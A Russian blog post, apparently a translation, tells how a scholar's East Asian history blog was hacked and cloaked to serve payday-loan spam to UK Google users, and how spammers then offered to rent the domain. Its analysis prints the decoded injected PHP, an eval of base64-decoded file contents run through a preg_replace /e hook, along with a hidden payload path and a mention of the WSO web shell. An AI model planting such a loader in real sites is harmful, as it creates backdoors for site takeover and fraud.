Здесь я пишу о том, что мне интересно

Всегда в топе

· профессиональный аудит сайтов
· теория работы поисковых систем
· консультации по всем этапам продвижения
· блокады сайта фильтрами поиска
· стратегии непоискового и вирусного продвижения
· настройка компаний контекстной рекламы
· корпоративные аккаунты в соцсетях
· вывод сайтов из под санкций Google
· индивидуальное обучение

февраль 17, 2013, 17:57

Лягушка в колодце Восточной Азии




Некоторое время назад мне позвонил один человек с предложением купить мой домен froginawell.net за 500 долларов. Надо сказать, что это сайт я сам создал в 2004 году с целью поддержки нескольких научных блогов по истории Восточной Азии. Однако, поскольку, в то время я и сам писал докторскую диссертацию, то сам редко добавлял материалы в этот блог. Мои же коллеги, размещали соответствующие материалы чаще меня, и в итоге, в скором времени, мы собрали приличное количество уникальных статей по истории Восточной Азии, а сам сайт стал привлекать не менее приличный процент трафика из поисковых систем. Кроме того, поскольку сайт был научным, то я сознательно не размещал на нем какой-либо рекламы и твердо намеревался придерживаться этой линии. Вследствие этого я отказался от предложения, однако вскоре я получил это же предложение и по электронной почте, и снова ответил отказом.

Еще через неделю, я получил еще одно письмо от того же господина, назову его для удобства Джоном. Теперь он уже предлагал взять мой домен в аренду, мотивируя это тем, что кто-то пытается взломать мой домен. Кроме того, он указал и вероятную причину активности взломщиков – высокая ранжируемость по определенному поисковому запросу. И, самое интересное – цена. Стоимость аренды явно превосходила, возможную стоимость домена при продаже. Теперь Джон предлагал 150 долларов в сутки.

Ого! Что же «открывала» для него моя «лягушка»? Вообразив себя детективом, я провел небольшое расследование на тему «Кто этот человек?». Судя по электронному адресу – он являлся сотрудником британской компании, работающей в сфере солнечной энергетики, что я узнал уже из сайта самой компании (к слову, вполне приличный сайт, ничем не похожий на сайты подставных фирм-однодневок). Но зачем такой компании моя «лягушка в колодце»? Более того, не то, что ключевые слова, сама тематика солнечной энергетики НИКОГДА не появлялась в моем блоге. Продолжая ломать голову над истинными причинами, побудившими Джона обратиться ко мне, я обратил свое внимание на его слова о взломе.

Мой блог уже не раз оказывался взломанным, просто потому, что я забывал вовремя обновить Вордпресс. Особенность взломов состояла в том, что для владельца сайт остается прежним, а посетители видят другую информацию на сайте. По своей сути, взломщики начинают активно рекламировать очередной супер-препарат или устройство, которое к тому же, можно заказать прямо на сайте.

Но на этот раз ничего подобного я не обнаружил. Однако выяснилась следующая деталь, домашняя страница сайта почему-то сменила расширение с .html на .php и получила кусок непонятного кода в самом начале страницы. Все это явно свидетельствовало о том, что кто-то запускает на сайте какой-то исполняемый код.

К сожалению, на тот момент времени я был занят написанием диссертации и, потому, докапываться до истины было некогда. Тогда я удалил лишнее с домашней страницы, вернул прежнее расширение и восстановил весь блог из резервной копии. Вместе с этим я обратился в поддержку хостинга с просьбой о защите от взлома, на что мне ответили, что с радостью займутся безопасность моего блога, если я перейду на более дорогой тариф, в противном же случае, решение всех проблем безопасности они оставляли за владельцем блога, т.е. за мной.

После этого, я ответил Джону, что, несмотря на его щедрое предложение, я от него отказываюсь, поскольку не собираюсь размещать рекламу на блоге. В тот же день Джон ответил мне, что ссылка на взломанную версию «лягушки» все еще есть в выдаче Гугла. И я опять-таки, не мог взять в толк, о чем он говорит, а потому, сделал вывод, что Джон, вероятнее всего, видит ссылку на какую-нибудь закэшированную страницу в поисковике. Вместе с тем, Джон обратил мое внимание, на такой резкий интерес к моей «лягушке». По его словам все объяснялось высоким потенциалом блога для зарабатывания денег. Он вновь предложил назвать мне собственную цену блога, а также «повысил» плату за день аренды сайта до $250, которые, по его мнению, если не нужны мне, я мог бы отдать на благотворительность.

Я был шокирован. 250 долларов в день, для простенького блога о культуре Китая??? Мои подозрения к Джону и его предложению росли с каждым часом, я начал опасаться возможных последствий, к которым приведет такой вот «бесплатный сыр». И вновь я ответил ему, что не заинтересован в рекламе, ни за какие деньги.

Джон, конечно же, не сдавался. Следующее его письмо, по его словам, обещало быть последним. Однако, и в нем, Джон, как бизнесмен, привыкший переубеждать своих клиентов, и считавший, что все на свете имеет собственную цену, повысил стоимость аренды до $500. Теперь уже был озадачен я сам. С какой стати, человек, предлагавший мне разовый платеж в 500 долларов за домен, решил платить туже сумму ежедневно? Впрочем, озадаченность Джона вполне понятна, не каждый день встретишь человека, который отказывается от гарантированных 500 долларов в день. На последнее письмо Джона, я ответил очередным отказом и пожеланием удачи в области солнечной энергетики.

Однако, теперь уже и я сам, был заинтересован, тем, что же видел Джон, на моем сайте и чего там не вижу я.

Я снова обнаружил измененное расширение домашней страницы и строчки непонятного кода. Видимо, лазейка была не в прежней версии блога, которую я поменял на архивную, а где-то в другом месте. Я должен был пройти путь взломщика с конца к началу.

Взломщики сделали так:



Во-первых, они добавили в первые строки домашней страницы скрипт, который находил определенные слова и заменял их на необходимые хакерам. Сами же слова были заменены набором кодов ASCII символов (причем в десятичном и шестнадцатеричном представлении). Такой пример, направлен на то, чтобы человек не сильно разбирающийся в IT не смог увидеть какие слова и на что заменяет скрипт. Для того чтобы перевести всю эту цифровую-символьную белиберду в обычные буквы я использовал команду на python'е. В итоге я получил следующее сообщение:

<оригинальный текст из статьи>
Искать: |(.*)|ei
Заменять на: eval('$kgv=89483;'.base64_decode(implode("\n",file(base64_decode("\1")))));$kgv=89483;
В тексте: L2hvbWUvZnJvZ2kyL3B1YmxpY19odG1sL2tvcmVhL3dwLWluY2x1Z
GVzL2pzL2Nyb3AvbG9nLy4lODI4RSUwMDEzJUI4RjMlQkMxQiVCMjJCJTRGNTc=

Понятно, что эта информация была зашифрована с использованием метода Base64. Его я так же смог расшифровать, выполнив в терминале своего Мака следующую команду:
<оригинальный текст из статьи>
base64 -i закодированный-текст.txt -o результат-расшифровки.txt

В итоге, я получил информацию о «месте жительства» одного из файлов с дополнительными командами:
<оригинальный текст из статьи>
[…]public_html/korea/wp-includes/js/crop/log/.%828E%0013%B8F3%BC1B%B22B%4F57


Самое печальное было в том, что таких файлов были десятки. Т.е. код с домашней страницы запускал команды, спрятанные где-то глубоко в структуре папок сайта. К слову сказать, имена файлов с такими командами, также были зашифрованы. Однако, всей этой информации уже было достаточно чтобы понять, что, весь скрипт работал на то, чтобы менять домашнюю страницу блога для Гугла при определенных условиях.

Так, один из файлов с командами создавал вместо моей «лягушки» версию сайта speedypaydayloan.co.uk, попасть на который могли пользователи только из Великобритании, только из Гугла и только по поисковому запросу «краткосрочный кредит». Данный сайт, как выяснил я на многочисленных форумах, был связан с «левой» британской фирмой «D and D Marketing», которая занималась разными аферами, связанными с краткосрочными кредитами. Итак, пользователи попадали на мой блог, «загримированный» под сайт краткосрочных кредитов, и перенаправлялись с него на один из обширного списка мошеннических сайтов.

Вскоре выяснилось, что я обнаружил только одно из хранилищ «зловредов» в своем блоге. На самом деле их было множество. Хакерам же удалось воспользоваться уязвимостью старых версий Вордпресса и установить в одну из папок сайта так называемую WSO – один из наиболее эффективных и опасных инструментов взломщиков.

Причем здесь Джон?



Ознакомившись с проблемами своего блога, я задал себе этот вопрос. Как, компания, занимающаяся солнечной энергетикой, связана с краткосрочными кредитами. И вот что я узнал. Во-первых, большая часть посетителей попадал на «лягушку» через запрос «краткосрочные кредиты». Всего около месяца назад, рейтинг блога по этой фразе стал резко расти (тогда-то сайт и взломали). И как результат – сайт получил не сотни, и не тысячи, а сотни тысяч посетителей. Но почему, же выросли рейтинги?

Я продолжил свое «расследование» и вспомнил, что Джон, однажды упомянул о том, что занимается разными вещами. Соответственно, солнечная энергетика – не единственное его занятие. Тогда я ввел в поиск имя Джон и фразу «кредиты Великобритания». Как ни странно, но я нашел его, поскольку на его имя были зарегистрированы несколько доменов, среди которых был и сайт по краткосрочным кредитам, и сайт для оформления кредита по телефону и многие другие финансовые предприятия, которые, судя по всему, уже не работали. Исходя из этой информации, становилось вполне понятно, почему Джона заинтересовало высокое ранжирование по ключу «краткосрочные кредиты». Конечно, высокие рейтинги, могли бы серьезно улучшите его финансовое положение, и мое тоже. Впрочем, не известно насколько честным было его предложение, и каким образом он планировал окупить такую аренду. Позже оказалось, что Джон был лишь первым искателем быстрых денег. Я укрепил защиту сайта так, как только мог. Удалил все внедренное в него хакерами, сменил все пароли. В инструментах Гугла указал на «нечестно заработанные» высокие рейтинги своего сайта. Таким образом, я хотел погасить интерес любителей наживы к своему блогу. Но письма с предложениями не прекращались.

Один из, судя по всему, конкурентов Джона, назову его Питер, прислал мне электронное письмо, в котором излагалось абсолютно все то, что я выяснил в ходе своего «расследования». А именно, Питер указывал на причастность русских хакеров, которые пытаются заработать на партнерских программах. По его мнению, ссылка на моем блоге, может приносить порядка 10000 долларов в неделю. Далее Питер заявил, что желал бы пресечь деятельность хакера с моей помощью, а в качестве компенсации я бы получал солидные недельные отчисления от рекламы с моего сайта. Кроме того, Питер, вполне честно предупредил, о противозаконности наших с ним возможных действий. Впрочем, на мое решение это никак не повлияло, и я вежливо отклонил его предложение. Следующим сюрпризом для меня, а точнее для «лягушки» оказалась DoS атака. Несколько роботов, в разных уголках мира пытались загрузить страницу около 50 тысяч раз в течение 10 минут. Но здесь оперативно сработал хостинг-провайдер и временно забанил мой аккаунт из-за такой нагрузки на сервер. Мне, принимая во внимание такие нагрузки, был предложен выделенный сервер, по заоблачной цене, от которого я, конечно же, отказался. Через пару дней мой аккаунт разблокировали, но при очередной DoS атаке, хостинг-провайдер не предпринял попыток по его защите, что снова привело к «падению» сайта. Постепенно у меня складывалось ощущение, что я страдаю за то, что отказываюсь от огромных денег.

Еще через пару дней, сразу несколько компаний, предложили свои услуги по информационной безопасности и отражению DoS атак. Интересно, я ведь не давал соответствующих объявлений. Откуда же они узнали, что я именно сейчас нуждаюсь в таких услугах?

Затем еще один любитель быстрых денег – пусть он будет Стивом, через твиттер объяснил мне, что наказать русских хакеров не получится, а потому предложил извлечь выгоду из ситуации. Схема – все та же – он размещает рекламные ссылки на моем блоге и делится со мной доходом, которые по его оценкам мог доходить до 15 тысяч фунтов стерлингов в день.

Стив, так же как и его предшественники получил отказ. Через некоторое время ситуация в выдаче Гугла стала изменяться. Тогда я задал вопрос Стиву, Не знает ли он еще какой информации о взломе моего блога. Оказалось – знает, и любезно предоставил целый список сайтов, взломанных по той же схему. С одним лишь отличием – они все указывали в ссылках на мою «лягушку» с ключом «краткосрочные кредиты». Вот в чем была причина резкого роста рейтингов моей «лягушки в колодце». Стив также предположил, что данный прием сработал поскольку «лягушка» была для Гугла доверенным сайтом и потому не вызвал подозрений у поисковика.

Итак, я очень надеюсь, что с падением ранжирования блога, все псевдо-предприниматели потеряют интерес к моему сайту. А Джон, Стив и Питер, равно как и парни из России – продолжают работать и зарабатывать огромные деньги на пустом месте.

Использована работа "frog in a stream"
Credits: grendelkhan


P.S. Это перевод чужой статьи с английского...



Поделитесь постом

f t                                                                         

Вам будет интересно

Если вас заинтересовали мои услуги


Мои расценки


Аудит сайта
от $900
срок исполнения 6 рабочих дней


Консультация
$200-$400 в час
в рабочее по Москве время


Мои реквизиты


ИП Смирнов Евгений Дмитриевич
св-во №309343525900080
выдано 16 сентября 2009
ИНН: 344100235769
КПП: 344402001
Расчетный счет: 40802810831000379201
Кор. Счет: 30101810100000000715
БИК: 041806715
Банк: Южный ф-л ПАО «Промсвязьбанк», г.Волгоград

TOP